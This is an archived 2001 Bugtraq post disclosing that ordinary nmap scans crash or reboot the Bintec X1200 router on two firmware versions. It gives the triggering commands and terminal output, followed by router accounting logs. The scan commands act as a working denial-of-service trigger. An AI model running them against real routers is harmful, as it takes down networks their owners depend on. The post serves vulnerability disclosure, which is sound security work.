[20142] in bugtraq
BINTEC X1200
daemon@ATHENA.MIT.EDU (Johnny Cyberpunk)
Wed Apr 11 02:25:07 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-ID: <001301c0c121$c2ad6940$2100a8c0@illegalaccess.de>
Date: Mon, 9 Apr 2001 20:20:30 +0200
Reply-To: Johnny Cyberpunk <johncybpk@GMX.NET>
From: Johnny Cyberpunk <johncybpk@GMX.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Kai,
sorry for the less information if've given in the last post. here is the
detailed info.
if've proofed these exploits on two different BIOS Versions again some
minutes ago.
These BIOS are available for download at www.bintec.de for the Bintec X1200
Router.
First Version V5.1 Rev 6
nmap <ip> -sU -p '53-53'
This affects that the Router is booting.
It seems that the Router is vulnerable for a normal Port 53 UDP scan.
-------------------------------------------------------------------------
Second Version V5.3 Rev 1
nmap <ip>
Halts the System and Power off is nessessary.
Here is the Output :
----------------------
[root@xxxxx /root]# nmap 192.168.0.1
Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ ) # starting nmap
against bintech x1200
caught SIGINT signal, cleaning up # after about 3 sec
[root@xxxxx /root]# ping c0r3 # trying to ping bintec x1200...
PING 192.168.0.1 from 192.168.0.22 : 56(84) bytes of data. # no response...
--- 192.168.0.1 ping statistics ---
7 packets transmitted, 0 packets received, 100% packet loss
[root@xxxxx /root]#55 192.168.0.1 INET: dialup if 10001 prot 17
192.168.0.21:1034->205.188.153.102:4000
Apr 9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 19:19:27 2 6
192.168.0.22:2100/1000 -> 62.112.136.241:80/10001 24 3585 36 44513
Apr 9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 19:19:27 0 17
217.80.196.15:1025/0 -> 212.185.248.116:53/10001 1 63 1 173
Apr 9 19:17:48 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1309 6
192.168.0.22:2092/1000 -> 62.112.136.241:80/10001 24 12334 24 5727
Apr 9 19:18:10 192.168.0.1 ACCT: INET: 09.04.2001 19:19:47 0 17
192.168.0.21:1034/1000 -> 205.188.153.102:4000/10001 2 76 1 38
Apr 9 19:18:32 192.168.0.1 ACCT: INET: 09.04.2001 19:20:11 0 6
192.168.0.22:2101/1000 -> 62.112.136.241:80/10001 6 800 6 2170
Apr 9 19:18:32 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1354 6
192.168.0.22:2093/1000 -> 62.112.136.241:80/10001 23 10464 24 5554
Apr 9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 19:20:26 1 6
192.168.0.22:2102/1000 -> 62.112.136.241:80/10001 30 2139 48 63801
Apr 9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1369 6
192.168.0.22:2094/1000 -> 62.112.136.241:80/10001 23 10570 23 5498
Apr 9 19:18:54 192.168.0.1 ACCT: INET: 09.04.2001 18:57:37 1370 6
192.168.0.22:2095/1000 -> 62.112.136.241:80/10001 22 9835 22 5181
Apr 9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:27 11 6
192.168.0.22:2103/1000 -> 62.112.136.241:80/10001 7 1479 7 1452
Apr 9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:38 1 6
192.168.0.22:2104/1000 -> 62.112.136.241:80/10001 12 1285 13 13119
Apr 9 19:19:05 192.168.0.1 ACCT: INET: 09.04.2001 19:20:43 1 6
192.168.0.22:2105/1000 -> 62.112.136.241:80/10001 21 1860 32 40868
Apr 9 19:19:16 192.168.0.1 ACCT: INET: 09.04.2001 19:20:48 0 17
192.168.0.21:1034/1000 -> 205.188.153.102:4000/10001 2 76 1 38
Apr 9 19:19:38 192.168.0.1 ACCT: INET: 09.04.2001 19:21:15 3 6
192.168.0.21:1043/1000 -> 64.4.13.235:1863/10001 9 449 7 381
Apr 9 19:20:53 192.168.0.1 ETHER: slot 1: Auto-negotiation done
(100BaseTx/halfdup)1 # after reboot
